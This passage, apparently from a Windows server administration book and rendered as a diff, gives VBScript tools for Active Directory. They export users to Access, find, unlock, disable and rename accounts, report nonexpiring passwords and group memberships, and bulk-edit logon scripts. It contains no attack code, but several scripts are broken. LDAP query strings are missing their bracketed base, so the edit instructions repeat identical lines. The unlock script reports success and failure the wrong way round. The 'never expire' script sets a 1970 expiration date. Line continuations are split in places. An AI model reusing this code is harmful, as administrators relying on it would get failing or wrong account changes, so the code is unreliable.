+objRecordsetDB("DisplayName") = .displayName
+
+objRecordsetDB("Description") = .description
+objRecordsetDB("OfficeLocation") = .physicalDeliveryOfficeName
+objRecordsetDB("WorkPhone") = .telephoneNumber
+objRecordsetDB("Email") = .mail
+objRecordsetDB("WebPage") = .wwwHomePage
+objRecordsetDB("Street") = .streetAddress
+objRecordsetDB("POBox") = .postOfficeBox
+objRecordsetDB("City") = .l
+objRecordsetDB("StateOrProvince") = .st
+objRecordsetDB("PostalCode") = .postalCode
+objRecordsetDB("CountryOrRegion") = .co
+objRecordsetDB("HomePhone") = .homePhone
+objRecordsetDB("Pager") = .pager
+objRecordsetDB("MobilePhone") = .mobile
+objRecordsetDB("FaxNumber") = .facsimileTelephoneNumber
+objRecordsetDB("Notes") = .info
+objRecordsetDB("Title") = .title
+objRecordsetDB("Department") = .department
+
+objRecordsetDB("CompanyName") = .company
+' Get the distiguished name of the manager
+strManagerDN = .manager
+' If manager value is not blank then process
+If strManagerDN <> "" Then
+' Bind to manager's account
+Set objManager = GetObject("LDAP://" & strManagerDN & "")
+' Populate the Access database with the display name of the
+manager
+objRecordsetDB("Manager") = objManager.displayName
+' Release this object reference
+Set objManager = Nothing
+End If
+' Define that this record was exported from AD
+objRecordsetDB("ImportedFromAD") = "True"
+
+' Commit the record
+objRecordsetDB.Update
+' Release this object reference
+Set objUser = Nothing
+End If
+End With
+End If
+End If
+' Move to the next record in the AD recordset
+objRecordsetAD.MoveNext
+Loop
+' Close the Access database recordset
+objRecordsetDB.Close
+' Close the Access database connection
+
+objConnectionDB.Close
+' Release these object references
+Set objRecordsetDB = Nothing
+Set objConnectionDB = Nothing
+' Close the AD recordset
+objRecordsetAD.Close
+' Close the AD connection
+objConnectionAD.Close
+' Release these object references
+Set objRecordsetAD = Nothing
+Set objConnectionAD = Nothing
+' Let the user know how long this process took
+WScript.Echo "The script completed in approximately " & _
+
+Second(TimeValue(now( )) - dtStart) & _
+" seconds."
+' That's all folks!
+Wscript.Quit
+Running the Hack
+This database and script version has been tested on various
+versions of Windows (the minimum requirements tested were
+Windows 2000 Service Pack 2 running Internet Explorer 5 with
+Microsoft Windows Script v5.5 participating in a small Active
+Directory domain). Though this solution works for me, your
+results may vary due to environmental differences. I saved
+these items in a directory named C:\EmployeeInfo. If you save
+them somewhere else on your system, you will need to modify
+the Data Access Page connection string in the EmployeeInfo.htm
+file. This can be done from within Access or by editing the .htm
+file directly. Also, the script and database should be in the same
+directory. If they are in different directories, you should edit the
+AccessDatabase constant in the script to point to the proper
+location where the database is saved.
+To run the script, simply type cscript ExportAdUsers.vbs from the
+command line from the current directory in which the script is
+found. The script, database, and HTML form page are all
+available from the O'Reilly web site.
+Figure 2-8 shows a sample session on running the script.
+
+Figure 2-8. Output of running the
+ExportAdUsers.vbs script
+Dan Thomson
+
+Hack 24 Restore the Active Directory
+Icon in Windows XP
+A useful feature in Windows 2000 that enables users to browse
+Active Directory is missing in Windows XP; here's how to get it
+back.
+In Windows 2000, when Active Directory is deployed, a user can
+easily browse Active Directory by double-clicking on My
+Network Places and then double-clicking on Entire Network.
+This displays the Directory icon (Figure 2-9), which represents
+Active Directory for the network.
+Figure 2-9. The Directory icon in Windows 2000
+
+Successive double-clicking on this icon can then display
+information about which users, groups, printers, and other
+objects are listed for each domain. For each object selected,
+only a limited amount of information is displayed, but this can
+sometimes be handy for users who need to browse the directory
+for information. For example, a User object has a properties sheet
+with only three tabs on it: General, Address, and Business (see
+Figure 2-10), which is much less than the dozen or so tabs
+displayed when the properties sheet for the object is opened in
+Active Directory Users and Computers. Note that the user
+information is grayed out in the Figure 2-10; this is because the
+currently logged on user (James Brown) is an ordinary user and
+therefore can view selected information about other users but
+cannot change this information.
+Figure 2-10. Browsing the Directory icon for
+information about a user
+
+Unfortunately, in Windows XP the directory icon is now gone, but
+if you want your users to have access to it, you can use this
+hack to add it back. If you have Windows 2000 computers
+running on your network (hopefully, with the latest service pack),
+the steps are simple. If not, you'll need the full instructions.
+The Easy Way
+
+If you have a Windows 2000 computer handy, simply navigate to
+the C:\Windows\system32 directory of the Windows 2000
+computer and find the dsfolder.dll file. Copy that file to the
+system32 directory of your Windows XP computer. Now click
+Start, and then click Run. In the Open box, type regsvr32
+dsfolder.dll and then click OK. When you receive the message
+"DllRegisterServer in dsfolder.dll succeeded," click OK.
+The Hard Way
+If you don't have a Windows 2000 computer handy, do the
+following:
+1. Download the latest Microsoft Windows 2000 service
+pack from
+http://www.microsoft.com/windows2000/downloads/servicepacks/
+Use an extract program (e.g., WinZip) to extract the files to
+a new folder.
+In the new folder, double-click i386.
+In the i386 folder, expand the compressed Dsfolder.dl file to
+Dsfolder.dll. To do so, first note the location of the folder where
+you extracted the files in step 2. For example, the i386 folder
+path might be C:\Documents and
+Settings\UserName\FolderName\i386 or something similar. Click
+Start, and then click Run. In the Open box, type a command that
+is similar to this:
+Expand "C:\Documents and Settings\UserName\FolderName\i386\Dsfolder.dl_"
+
+"C:\Documents and Settings\UserName\FolderName\i386\Dsfolder.dll"
+In Windows Explorer, copy Dsfolder.dll from the i386 folder to
+the C:\Windows\System32 folder. Note that your Windows folder
+might be named something other than Windows, depending on
+whether you did a clean install or upgrade.
+Finally, click Start, and then click Run. In the Open box,
+type regsvr32 dsfolder.dll and then click OK. When you receive
+the message "DllRegisterServer in dsfolder.dll succeeded," click
+OK.
+The next time you view Network Neighborhood, you should have
+an Active Directory icon available.
+John Gormly
+
+Chapter 3. User Management
+Hacks #25-35
+Section 25. Search for Domain Users
+Section 26. Manage User Accounts in Active Directory
+Section 27. Get a List of Disabled Accounts
+Section 28. Get User Account Information
+Section 29. Check for Passwords that Never Expire
+Section 30. Enumerate Group Membership to a CSV
+File
+Section 31. Modify User Properties for All Users in a
+Particular OU
+Section 32. Check Group Membership and Map Drives
+in a Logon Script
+Section 33. Script Creation of a User's Home Directory
+and Permissions
+Section 34. Prevent Ordinary Users from Creating
+Local Accounts
+Section 35. Put a Logoff Icon on the Desktop
+
+Hacks #25-35
+A large part of day-to-day administration of an Active Directory
+environment is managing users and their accounts. The usual
+way of doing this is with the Active Directory Users and
+Computers (ADUC) console, but when it comes to organizations
+with thousands of users, this tool can be frustrating to use.
+This chapter is about alternatives to ADUCways of doing things
+faster using scripts. You'll find scripts to display information
+about users, find specific users on your network, change user
+passwords, unlock user accounts, get a list of disabled
+accounts, display which groups a user belongs to, and more. If
+you're familiar with VBScript, you can also customize these
+scripts further to meet the specific needs of your own networking
+environment.
+For all these scripts, make sure you have the latest scripting
+engines on the workstation from which you run the script. You
+can download the latest scripting engines from the Microsoft
+Scripting home page (http://msdn.microsoft.com/scripting/).
+Also, when working with the Active Directory Services Interface
+(ADSI), you must have the same applicable rights you need to
+use the built-in administrative tools. For more information, see
+Microsoft's ADSI web page
+(http://www.microsoft.com/windows2000/techinfo/howitworks/activedirectory/adsilinks.asp
+
+Hack 25 Search for Domain Users
+Programmatically search for a user in a mixed Windows NT/2000
+environment.
+If you are in the process of migrating from Windows NT to
+Windows 2000, you can certainly appreciate the search
+capabilities provided in Active Directory administrative tools. At
+the same time, more than ever, you suffer from its absence in the
+User Manager. This issue becomes especially acute in
+environments where there is no consistent naming convention or
+when the naming convention happened to change several times
+over years. The sorting feature might help, but only provided
+that a person responsible for creating accounts entered the full
+name correctly and in the same format. Misspellings or using
+diminutives and nicknames are other frequent causes of
+confusion. Your search becomes considerably more time
+consuming if you manage multiple domains with different naming
+conventions.
+To resolve a problem, you can employ a couple of approaches.
+The first one involves exporting a user list, along with each
+user's properties, into a comma-delimited file or a database
+(e.g., Access or SQL). The main drawback of this solution is the
+need for regular updates of the exported list. The second
+drawback, which eliminates the need for maintenance, is using
+an ADSI-based script.
+This approach is shown in the script that follows.
+
+The Code
+The script allows searches against multiple domains. In order to
+accomplish this, you need to provide as the second input
+argument the list of domains (individual names need to be
+separated by semicolons). The first argument of the script is the
+part of the username (of any length) that you want to match
+against account names. Type the script into Notepad (with Word
+Wrap disabled) and save it with a .vbs extension as
+FindUser.vbs:
+'***************************************************************
+'*** The script searches for a username in one on more domains by
+'*** looking for a match on the string of characters you specify.
+'***
+'*** The syntax:
+'*** cscript //nologo FindUser.vbs string dom1[;dom2]
+'*** where string is used to match against the username
+'*** dom1;dom2 is the semicolon separated list of one or
+'*** more domains to search (no limit on number of entries)
+'***************************************************************
+'*** variable declaration
+
+Dim sName 'string to match against
+Dim sDom 'string storing list of domains
+Dim aDom 'array storing list of domains
+Dim iCount 'counter variable
+Dim oDomain 'object representing domain
+Dim oUser 'object representing user account
+Dim sLine 'string containing results of the search
+'***************************************************************
+'*** variable initialization
+sName = Wscript.Arguments(0)
+sDom = Wscript.Arguments(1)
+aDom = Split(sDom, ";")
+'***************************************************************
+
+'*** search for matches in the loop
+For iCount=0 To UBound(aDom)
+Set oDomain = GetObject("WinNT://" & aDom(iCount))
+oDomain.Filter = Array("user")
+For Each oUser in oDomain
+If InStr(1, oUser.name, sName, 1) > 0 Then
+sLine = oDomain.Name & "\" & oUser.Name & ";"
+SLine = sLine & oUser.Description & ";"
+SLine = sLine & OUser.FullName & ";"
+WScript.Echo sLine
+End If
+Next
+Next
+Running the Hack
+
+When you run FindUser.vbs using Cscript.exe in a command-
+prompt window, you can easily find the full name and domain for
+a user, given his username. For example, when I search to see if
+the username bsmith is present in the MTIT domain, I find that
+user Bob Smith is assigned that username (Figure 3-1).
+Figure 3-1. Using FindUser.vbs to check whether
+username bsmith is already used
+Marcin Policht
+
+Hack 26 Manage User Accounts in Active
+Directory
+Use these five handy scripts to easily manage domain user
+accounts.
+While the usual way of managing user accounts in Active
+Directory is to use the Active Directory Users and Computers
+(ADUC) console, that GUI approach to managing accounts can
+be tedious if your organization is large and you have many
+accounts to manage. This hack provides examples of scripts
+you can use to simplify things and speed up common
+administrative tasks, and I think you'll find them quite useful.
+You can even use some of them to delegate certain tasks to
+nonadministrators to save you time and trouble.
+To use one of these scripts, type it into Notepad (with Word Wrap
+turned off) and save it with a .vbs extension. Then, type
+cscript.exe scriptname.vbs from a command prompt, or create a
+shortcut to the script and double-click on the shortcut to run the
+script.
+Changing a User's Domain Password
+This simple script allows you to give others the ability to change
+end users' passwords without having to install the
+
+administration tools. The script prompts for the domain,
+username, and new password, and notifies the user of whether
+the password change was successful:
+Dim UserName
+Dim UserDomain
+UserDomain = InputBox("Enter the user's domain:")
+UserName = InputBox("Enter the user's login name:")
+Set User = GetObject("WinNT://" & UserDomain & "/"& UserName &"",user)
+Dim NewPassword
+NewPassword = InputBox("Enter new password")
+Call User.SetPassword(NewPassword)
+If err.number = 0 Then
+Wscript.Echo "The password change was successful."
+Else
+Wscript.Echo "The password change failed!"
+End if
+
+Changing User Account Names in Active
+Directory
+Using VBScript, changing a user's account name in the Active
+Directory is a quick process:
+Set oDomain = GetObject("WINNT:\\domainname")
+Set oUser = oDomain.GetObject("originalusername")
+oDomain.MoveHere oUser.AdsPath, "newusername"
+You just need to connect to the specific domain (as indicated in
+the first line), set the original username (the second line), and
+then change the username using the MoveHere method (the third
+line). This is a much simpler process than opening up the MMC
+and either navigating to the username or searching the Active
+Directory for the account instances.
+A script like this is extremely useful for occasions when names
+change due to things like marriage, or when the user just can't
+stand the name they were given for logging in.
+Customize the script with the appropriate domain name
+(domainname), the user's old account name (originalusername), and
+the user's new account name (newusername).
+Unlocking a Windows 2000 Domain
+Account
+Need a quick and easy way to unlock a Windows 2000 domain
+
+account? Use VBScript. The following script prompts for the
+username, then the user's domain, and unlocks the specified
+account:
+UserName = InputBox("Enter the user's login name that you want to unlock:")
+DomainName = InputBox("Enter the domain name in which the user account exists:")
+Set UserObj = GetObject("WinNT://"& DomainName &"/"& UserName &"")
+If UserObj.IsAccountLocked = -1 then UserObj.IsAccountLocked = 0
+UserObj.SetInfo
+If err.number = 0 Then
+Wscript.Echo "The Account Unlock Failed. Check that the account is, " & _
+"in fact, locked-out."
+Else
+Wscript.Echo "The Account Unlock was Successful"
+End if
+Disabling a Domain Account
+
+Use this handy VBScript to quickly disable a user account in the
+specified domain. This script prompts for the username and
+domain and then disables the account you specify:
+Dim Username
+Dim UserDomain
+UserDomain = InputBox("Enter the user's domain:")
+UserName = InputBox("Enter the user's login name:")
+Set UserObj = GetObject("WinNT://" & UserDomain & "/" & Username &)
+UserObj.AccountDisabled = True
+UserObj.SetInfo
+Set UserObj = Nothing
+Setting the Account to Not Expire
+This handy script configures a user account to not expire. The
+script works by setting the expiration date attribute to a past
+date:
+Set objUser = GetObject _
+("LDAP://cn=yourcontainer,ou=yourOU,dc=yourDC,dc=com")
+objUser.AccountExpirationDate = "01/01/1970"
+objUser.SetInfo
+
+To use the script, customize the second line as desired. For
+example, if the user account for user Bob Smith resides in the
+Sales OU in the mtit.com domain, this line should be changed to:
+("LDAP://cn=Bob Smith,ou=Sales,dc=mtit,dc=com")
+Be judicious in deciding which accounts should be set to not
+expire, as such accounts could pose a security risk. See [Hack
+#29] for a quick way to search for such accounts on your
+network.
+Rod Trent
+
+Hack 27 Get a List of Disabled Accounts
+Here's a fast way to determine any disabled user accounts in
+your Active Directory forest.
+Disabled accounts are accounts that still exist in Active
+Directory but cannot be used to log on to the network. For
+example, when an employee moves on to a different company, a
+common practice is to disable the individual's user account
+instead of deleting it. That way, the account can be reassigned
+to the individual's replacement, renamed, and used to access all
+the resources the previous employee had permission to access.
+Sometimes, though, you might forget which accounts have been
+disabled on your network, and it would be nice to have a way to
+find all disabled accounts.
+You can use this VBScript to do just thatlocate all of the
+disabled accounts in Active Directory. This is useful for
+inventory purpose but also for securityfor example, to verify that
+the Guest account and other vulnerable accounts are in fact still
+disabled on your network.
+The Code
+Simply type the script into Notepad (with Word Wrap turned off)
+and save it with a .vbs extension as DisabledAccounts.vbs:
+
+Const ADS_UF_ACCOUNTDISABLE = 2
+Set objConnection = CreateObject("ADODB.Connection")
+objConnection.Open "Provider=ADsDSOObject;"
+Set objCommand = CreateObject("ADODB.Command")
+objCommand.ActiveConnection = objConnection
+objCommand.CommandText = _
+";(objectCategory=User)" & _
+";userAccountControl,distinguishedName;subtree"
+Set objRecordSet = objCommand.Execute
+intCounter = 0
+While Not objRecordset.EOF
+intUAC=objRecordset.Fields("userAccountControl")
+If intUAC AND ADS_UF_ACCOUNTDISABLE Then
+WScript.echo objRecordset.Fields("distinguishedName") & " is disabled"
+intCounter = intCounter + 1
+End If
+
+objRecordset.MoveNext
+Wend
+WScript.Echo VbCrLf & "A total of " & intCounter & " accounts are disabled."
+objConnection.Close
+Make sure you have the latest scripting engines on the
+workstation you run this script from. You can download the latest
+scripting engines from the Microsoft Scripting home page
+(http://msdn.microsoft.com/library/default.asp?
+url=/nhp/Default.asp?contentid=28001169). Also, when
+working with the Active Directory Services Interface (ADSI),
+you must have the same applicable rights you need to use the
+built-in administrative tools.
+Running the Hack
+To use the script, simply change this line to specify your own
+forest root domain:
+";(objectCategory=User)" & _
+For example, if your forest root domain is mtit.com, then the line
+should read:
+";(objectCategory=User)" & _
+
+Then, run the script by creating a shortcut to it and double-
+clicking on the shortcut. The output of the script is a series of
+dialog boxes, an example of which is shown in Figure 3-2.
+Figure 3-2. Displaying disabled domain user
+accounts
+Rod Trent
+
+Hack 28 Get User Account Information
+Need to find information about user accounts on a machine? Use
+this handy script to do it fast.
+This script lets you quickly query a Windows 2000 (or later)
+machine to determine what user accounts are present, whether
+local accounts in the SAM database or domain accounts in
+Active Directory. It will output a list of accounts, giving the
+following information for each account:
+Username of user
+Full name of user
+Account lockout status
+Whether the user is allowed to change the password
+Whether the account is nonexpiring or not
+The Code
+
+To use the script, simply type it into Notepad (with Word Wrap
+turned off) and save it with a .vbs extension as
+GetAccountInfo.vbs:
+ComputerName = localhost
+winmgmt1 = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
+Set UserSet = GetObject( winmgmt1 ).InstancesOf ("Win32_UserAccount")
+for each User in UserSet
+WScript.Echo "==============================================="
+WScript.Echo "Information for " & User.Name
+WScript.Echo "The full username for the specified computer is: " & _
+User.FullName
+WScript.Echo "Account Locked? " & User.Lockout
+WScript.Echo "Password can be changed?: " & User.PasswordChangeable
+WScript.Echo "Password is expirable: " & User.PasswordExpires
+WScript.Echo "==============================================="
+Next
+
+Running the Hack
+Here's some typical output when the script is run locally on a
+Windows 2000 domain controller. To avoid getting the series of
+dialog boxes that would appear if you ran the script using
+Wscript.exe, use Cscript.exe to run it from the command-line
+instead:
+C:\>cscript.exe C:\MyScripts\GetAccountInfo.vbs
+Microsoft (R) Windows Script Host Version 5.6
+Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
+===============================================
+Information for Administrator
+The full username for the specified computer is:
+Account Locked? False
+Password can be changed?: True
+Password is expirable: False
+===============================================
+===============================================
+Information for Guest
+
+The full username for the specified computer is:
+Account Locked? False
+Password can be changed?: False
+Password is expirable: False
+===============================================
+===============================================
+Information for jsmith
+The full username for the specified computer is: Jane Smith
+Account Locked? False
+Password can be changed?: True
+Password is expirable: False
+===============================================
+===============================================
+Information for bsmith
+The full username for the specified computer is: Bob Smith
+Account Locked? False
+Password can be changed?: True
+Password is expirable: True
+
+===============================================
+The output continues for the remaining accounts on the system.
+Hacking the Hack
+You can easily modify the script to get user information from a
+remote computer instead of from the local computer on which the
+script is running. This is useful when you want to run the script
+from an administrator workstation instead of interactively on a
+domain controller.
+Simply change this line:
+ComputerName = localhost
+to this:
+ComputerName = InputBox("Enter the name of the computer you wish to query")
+The script will prompt you with a dialog box (see Figure 3-3) for
+the name of the remote computer whose accounts you want to
+query. You can specify the NetBIOS name, DNS name, or IP
+address of the remote machine, as long as your currently
+logged-on account has administrative privileges on the remote
+machine.
+Figure 3-3. Querying user account information
+on a remote computer
+
+Rod Trent
+
+Hack 29 Check for Passwords that Never
+Expire
+Here's a handy script that makes it simple to find user accounts
+with nonexpiring passwords.
+User accounts set to never expire are sometimes used for
+permanent employees of a company, while temporary employees
+are assigned accounts that expire after a specified period of
+time. Ever wish you could quickly and simply find out which user
+accounts have their passwords set to never expire, along with
+the dates the flags were set? Here is a sample script that
+accomplishes this and more.
+This script prompts for the desired domain, checks all user
+accounts in the domain to see if their passwords are set to never
+expire, and reports the date the flags were set. It then writes the
+output to a CSV file called PWDNeverExpired.csv, creating this
+file in the same directory where the script itself is located. If the
+password is not set to expire, the script instead records a No and
+the date the password will expire.
+The Code
+To use the script, type it into Notepad (with Word Wrap turned
+off) and save it with a .vbs extension as PWDNeverExpired.vbs:
+
+' Set WshShell
+Set WshShell = WScript.CreateObject("WScript.Shell")
+strVer = "Ver 1.0 "
+Set FileSystem = WScript.CreateObject("Scripting.FileSystemObject")
+Set oFile = FileSystem.CreateTextFile("PWDNeverExpired.csv", true)
+' Pull Environment variables for domain/user
+strDomain = WshShell.ExpandEnvironmentStrings("%USERDOMAIN%")
+strUserName = WshShell.ExpandEnvironmentStrings("%USERNAME%")
+strOS = WshShell.ExpandEnvironmentStrings("%OS%")
+strMessage = strMessage & "Hit Cancel or enter a blank to quit"
+strTitle = "Domain to Search"
+'get resource domain name, domain default
+UserDomain = InputBox(strMessage, strTitle, strDomain)
+strMessage = ""
+strTitle = ""
+
+'strMessage = "Please enter the USER Login ID" & vbCrLf & vbCrLf & _
+'"Default is: " & strUserName & vbCrLf & vbCrLf
+'strMessage = strMessage & "Hit Cancel or enter a blank to quit"
+'strTitle = "USER Login ID"
+'get resource domain name, domain default via input box
+'objUserName = InputBox(strMessage, strTitle, strUserName)
+' Display Just a minute!
+strMessage = "This may take a few seconds. . ."
+WshShell.Popup strMessage,2,"One moment please. . . "
+strMessage = ""
+Set ObjDomain = GetObject("WinNT://" & UserDomain)
+ObjDomain.Filter = Array("User")
+For Each ObjUser In ObjDomain
+'Attempt to bind to the user
+
+'Set objUser = GetObject("WinNT://"& UserDomain &"/"& objUser.Name, user)
+Set UserName = GetObject("WinNT://" & UserDomain & "/" & ObjUser.Name & _ ",User")
+' Is password set to NEVER expire?
+objPwdExpires = UserName.Get("UserFlags")
+If (objPwdExpires And &H10000) <> 0 Then
+objPwdExpiresTrue = "Yes"
+strPwdExpires = "Date Set: "
+msgPwdExpires = "Password Set to Never Expire: "
+Else objPwdExpiresTrue = "No"
+strPwdExpires = "Password Expires: "
+msgPwdExpires = "Password Set to Never Expire: "
+End If
+oFile.WriteLine (UserName.fullname & "," & UserName.name & ","
+& _ msgPwdExpires & objPwdExpiresTrue & "," & strPwdExpires & _
+objUser.PasswordExpirationDate)
+'Wscript.Echo "Full Name: " & UserName.fullname & vbCrlf &_
+'"Account Name: " & UserName.name & vbCrlf &_
+
+'msgPwdExpires & objPwdExpiresTrue & vbCrlf &_
+'strPwdExpires & objUser.PasswordExpirationDate & vbCrlf
+Set UserName = Nothing
+Next
+Wscript.Echo "Done Cheking Accounts"
+Running the Hack
+To run this hack, simply create a shortcut to the script and
+double-click on the shortcut. Figure 3-4 shows a sample CSV
+output file for the script, viewed in Excel.
+Figure 3-4. Sample output from running
+PWDNeverExpired.vbs
+
+Hans Schefske
+
+Hack 30 Enumerate Group Membership
+to a CSV File
+Export a list of which users are in which groups to a comma-
+separated file that is suitable for opening in your favorite
+spreadsheet or database application.
+Finding out which users belong to which groups is not a trivial
+task from the GUI. Using Active Directory Users and Computers
+(ADUC), you can view the Member Of tab of a user's properties
+sheet to see which groups the user belongs to but not which
+users belong to which group. The properties sheet of a group is
+more informative and has two tabs: Members, which shows which
+users belong to the group, and Member Of, which tells you if the
+group itself belongs to any other groups. Opening these
+properties sheets is a time-consuming process and doesn't
+always give you quick insight into users and the groups to which
+they belong.
+But if you need a quick way of knowing what the members of
+different groups are, you can use VBScript. The script in this
+hack enumerates the groups in an Active Directory domain and
+places the information in a CSV file. The name of each group, the
+description of the group, the group's members (both full name
+and SAM account name), and whether that member is a user or
+group will all be placed into a CSV file called GroupMembers.csv,
+located in the directory in which the script is running. This script
+uses LDAP to query Active Directory. It won't run against an
+NT4 domain, although you should be able to run it from an NT4
+
+workstation. If you are not running Windows 2000 Professional
+or later, this script requires ADSI 2.5.
+The Code
+To use this script, type it into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as GroupMembers.vbs:
+On Error Resume Next
+Set FileSystem = WScript.CreateObject("Scripting.FileSystemObject")
+Set oFile = FileSystem.CreateTextFile("GroupMemebrs.csv", True)
+CRLF=CHR(13)+CHR(10)
+strDC = "DC01GA.My.Domain.com" 'Substitute your AD domain server name
+strRoot = "My.Domain.Com" 'Substitute your company/domain name
+strDomain = "DC=MY,DC=DOMAIN,DC=COM"
+Set DomainObj = GetObject("LDAP://" & strDC&"/CN=Users," & strDomain)
+if Err.Number <0 then
+wscript.echo "Failed to connect to " & strADName
+
+wscript.quit
+end if
+DomainObj.Filter = Array("group")
+For Each GroupObj In DomainObj
+If GroupObj.Class = "group" Then
+oFile.WriteLine ("Group Membership for: " & MID(GroupObj.Name & ","
+& _ "Description - " & GroupObj.Description,4))
+wscript.echo ("Group Membership for: " & MID(GroupObj.Name & vbTab & _
+CRLF & CRLF & _
+' "Description - " & GroupObj.Description,4))
+set memberlist=GroupObj.Members
+For Each member In memberlist
+oFile.WriteLine MID(member.Name & "," & member.SAMAccountName & "," & _ member.Class,4)
+wscript.echo MID(Vbtab & member.Name & " (" & member.Class & ")",5)
+next
+
+end if
+Next
+set DomainObj = Nothing
+set GroupObj = Nothing
+if err.number<>0 then
+wscript.echo CRLF
+wscript.echo ("ERROR: "&err.number&" "&err.description & " from "&err.source)
+wscript.echo CRLF
+end if
+Wscript.Echo "Done!!"
+wscript.quit
+Running the Hack
+Before you run the script, modify these three lines near the
+beginning:
+
+strDC = "DC01GA.My.Domain.com" 'Substitute your AD domain server name
+strRoot = "My.Domain.Com" 'Substitute your company/domain name
+strDomain = "DC=MY,DC=DOMAIN,DC=COM"
+For example, to query a domain controller named
+srv210.mtit.com in the mtit.com domain, change these lines to:
+strDC = "srv210.mtit.com" 'Substitute your AD domain server name
+strRoot = "mtit.com" 'Substitute your company/domain name
+strDomain = "DC=MTIT,DC=COM"
+Also note that the script lists only groups located in the Users
+container. To query other containers or organizational units,
+modify the following line accordingly:
+Set DomainObj = GetObject("LDAP://" & strDC&"/CN=Users," & strDomain)
+To run the hack, simply create a shortcut to it and double-click
+on the shortcut.
+Figure 3-5 shows a sample of typical output for the script, with
+the CSV file imported into Excel to make it more readable. You
+can see that the Domain Admins group has members Bob Smith,
+Frank Jones, Jane Smith, and the default Administrator account.
+Figure 3-5. A portion of sample output from
+running the GroupMembers.vbs script
+
+Hans Schefske
+
+Hack 31 Modify User Properties for All
+Users in a Particular OU
+Changing the logon script for all users in an organizational unit
+(OU) is a chore if you're working from the GUI, so try this script
+instead.
+The ability to quickly change the logon script that members of a
+particular OU are running is quick and easy though VBScript. To
+change the properties of objects located in a specific OU, you
+must first bind to that OU using ADSI. To do this, you must list
+all the parent OUs of the OUs you are trying to bind to, as shown
+in the script in this hack. Then you must gather all the
+usernames in the OU you are modifying and check to make sure
+they are indeed just users and not some other object. If they are
+users, change the path of the logon script property in their
+account to Network/NewLogon.cmd and set the changes in place.
+Then notify the person running the script that the changes have
+been completed.
+This script comes in handy when you need to modify common
+properties of many user accounts in a particular OU all at once
+in an Active Directory domain. In Windows 2000, unlike in NT4,
+you cannot just highlight the users you want to change, click on
+Properties and change a common property (e.g., Logon Script)
+for the users you have selected.
+
+The Code
+To use this script, type it into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as ModifyUsersOU.vbs:
+'~~Comment~~
+'Modify all users in a specific OU in Active Directory at once. This script
+'will change the logon script path For all users of the
+'"Network/Services/Users/Test" OU To "Network/newlogon.cmd".
+'~~Script~~
+'This is the actual LDAP. If the OU is a sub-OU, you must enter ALL of them.
+Set OU = GetObject("LDAP://DCServerName.MY.Domain.COM/OU=Test,OU=Users,OU=Services,OU=
+Network,DC=MY,DC=Domain,DC=com")
+'Setup to get all the users in the specified OU from above.
+'Gather each username.
+For Each oUser In OU
+'Make sure they are only USER class.
+If oUser.Class = "user" Then
+'Set the name of the login script itself here.
+oUser.Put "scriptpath", "Network\newlogon.cmd"
+
+'Set these settings.
+oUser.SetInfo
+End If
+Next
+Wscript.echo "The Network/Services/Users/Test OU has been updated!"
+Wscript.Quit
+Change the following line to specify the appropriate OU in your
+own network environment:
+Set OU = GetObject("LDAP://DCServerName.MY.Domain.COM/OU=Test,OU=Users,OU=Services,
+OU=Network,DC=MY,DC=Domain,DC=com")
+For example, if your OU is named Boston and your domain is
+mtit.com, then this line should be changed to:
+Set OU = GetObject("LDAP://DCServerName.MY.Domain.COM/OU=Boston, DC=
+Specify the new logon script, like so:
+oUser.Put "scriptpath", "Network\newlogon.cmd"
+Finally, specify the output for the ECHO by modifying this line as
+required:
+Wscript.echo "The Network/Services/Users/Test OU has been updated!"
+In our example, this line should be changed to:
+Wscript.echo "The Boston OU has been updated!"
+
+Hacking the Hack
+This script can easily be modified to change any of the User
+Object properties in a particular OU, such as:
+Profile Path
+Home Directory
+Home Drive Letter
+Email
+Description
+The script can of course be customized to modify virtually any
+other displayed properties of user objects.
+Hans Schefske
+
+Hack 32 Check Group Membership and
+Map Drives in a Logon Script
+Find out which group a user referenced within a logon script
+belongs to.
+Logon scripts are useful for mapping drives so that users can
+store their work files in standard locations on network file
+servers. It would be nice to be able to map drives based on a
+user's group membership, and that's what this hack is about. By
+placing a user's group membership information into a dictionary
+object, you can quickly find out if a user is a member of a group
+and then perform actions (such as mapping drives) if they are.
+The script in this hack allows you to accomplish this and more.
+This script quickly checks to see if a user is a member of a
+particular group. It reads the Member Of tab information for the
+user account and places it into a dictionary object, because a
+dictionary object offers fast and easy access to group
+membership information. If the user is a member of the group
+specified, a dialog box will tell you so.
+The Code
+To use this script, type it into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as CheckMembership.vbs.
+
+Option Explicit ' Force explicit declarations
+'
+' Variables
+'
+Dim WSHNetwork
+Dim FSO
+Dim strUserName ' Current user
+Dim strUserDomain ' Current User's domain name
+Dim ObjGroupDict ' Dictionary of groups to which the user belongs
+Set WSHNetwork = WScript.CreateObject("WScript.Network")
+Set FSO = CreateObject("Scripting.FileSystemObject")
+'
+' Wait until the user is really logged in...
+'
+strUserName = ""
+While strUserName = ""
+WScript.Sleep 100 ' 1/10 th of a second
+
+strUserName = WSHNetwork.UserName
+Wend
+strUserDomain = WSHNetwork.UserDomain
+' Read the user's account "Member Of" tab info across the network
+' once into a dictionary object.
+Set ObjGroupDict = CreateMemberOfObject(strUserDomain, strUserName)
+If MemberOf(ObjGroupDict, "Domain Admins") Then
+wscript.echo "Is a member of Domain Admins."
+'REM this line to Map Network Drives
+'Map network Drives here, UNREM the below lines:
+'WSHNetwork.MapNetworkDrive "O:", "\\server1\share"
+'WSHNetwork.MapNetworkDrive "Q:", "\\server2\share"
+Else
+
+wscript.echo "Is NOT a member of Domain Admins"
+End If
+Function MemberOf(ObjDict, strKey)
+' Given a Dictionary object containing groups to which the user
+' is a member of and a group name, then returns True if the group
+' is in the Dictionary else return False.
+'
+' Inputs:
+' strDict - Input, Name of a Dictionary object
+' strKey - Input, Value being searched for in
+' the Dictionary object
+' Sample Usage:
+'
+' If MemberOf(ObjGroupDict, "DOMAIN ADMINS") Then
+' wscript.echo "Is a member of Domain Admins."
+' End If
+'
+
+'
+MemberOf = CBool(ObjGroupDict.Exists(strKey))
+End Function
+Function CreateMemberOfObject(strDomain, strUserName)
+' Given a domain name and username, returns a Dictionary
+' object of groups to which the user is a member of.
+'
+' Inputs:
+'
+' strDomain - Input, NT Domain name
+' strUserName - Input, NT username
+'
+Dim objUser, objGroup
+
+Set CreateMemberOfObject = CreateObject("Scripting.Dictionary")
+CreateMemberOfObject.CompareMode = vbTextCompare
